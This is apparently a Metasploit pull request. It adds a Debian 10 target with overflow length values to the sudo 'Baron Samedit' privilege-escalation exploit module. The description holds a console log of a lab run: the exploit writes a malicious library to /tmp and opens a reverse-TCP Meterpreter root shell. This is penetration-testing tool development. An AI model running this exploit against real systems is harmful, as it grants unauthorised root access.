### PR TITLE
sudo_baron_samedit: Add target: Debian 10 x64, sudo v1.8.27, libc v2.28

### DIFF
--- a/modules/exploits/linux/local/sudo_baron_samedit.rb
+++ b/modules/exploits/linux/local/sudo_baron_samedit.rb
@@ -49,6 +49,7 @@ class MetasploitModule < Msf::Exploit::Local
             [ 'Manual', { } ],
             [ 'Ubuntu 20.04 x64 (sudo v1.8.31, libc v2.31)', { lengths: [ 56, 54, 63, 200 ] } ],
             [ 'Ubuntu 18.04 x64 (sudo v1.8.21, libc v2.27)', { lengths: [ 56, 54, 63, 212 ] } ],
+            [ 'Debian 10 x64 (sudo v1.8.27, libc v2.28)', { lengths: [ 64, 49, 60, 214 ] } ],
           ],
         'DefaultTarget'  => 1,
         'Arch'           => ARCH_X64,


### PR DESCRIPTION
```
msf6 > 
[*] Sending stage (3008420 bytes) to 172.16.191.133
[*] Meterpreter session 1 opened (172.16.191.165:1337 -> 172.16.191.133:37996) at 2021-02-05 02:50:52 -0500

msf6 > use exploit/linux/local/sudo_baron_samedit 
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/sudo_baron_samedit) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Manual
   1   Ubuntu 20.04 x64 (sudo v1.8.31, libc v2.31)
   2   Ubuntu 18.04 x64 (sudo v1.8.21, libc v2.27)
   3   Debian 10 x64 (sudo v1.8.27, libc v2.28)


msf6 exploit(linux/local/sudo_baron_samedit) > set target 3
target => 3
msf6 exploit(linux/local/sudo_baron_samedit) > set session 1
session => 1
msf6 exploit(linux/local/sudo_baron_samedit) > set verbose true
verbose => true
msf6 exploit(linux/local/sudo_baron_samedit) > check
[*] The target appears to be vulnerable. sudo 1.8.27 is a vulnerable build.
msf6 exploit(linux/local/sudo_baron_samedit) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. sudo 1.8.27 is a vulnerable build.
[*] Writing '/tmp/libnss_X/P0P_SH3LLZ_ .so.2' (564 bytes) ...
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3008420 bytes) to 172.16.191.133
[*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.133:60698) at 2021-02-05 02:52:46 -0500
   
meterpreter > getuid
Server username: root @ debian-10-0-0-x64 (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer     : debian-10-0-0-x64.local
OS           : Debian 10.0 (Linux 4.19.0-5-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 

```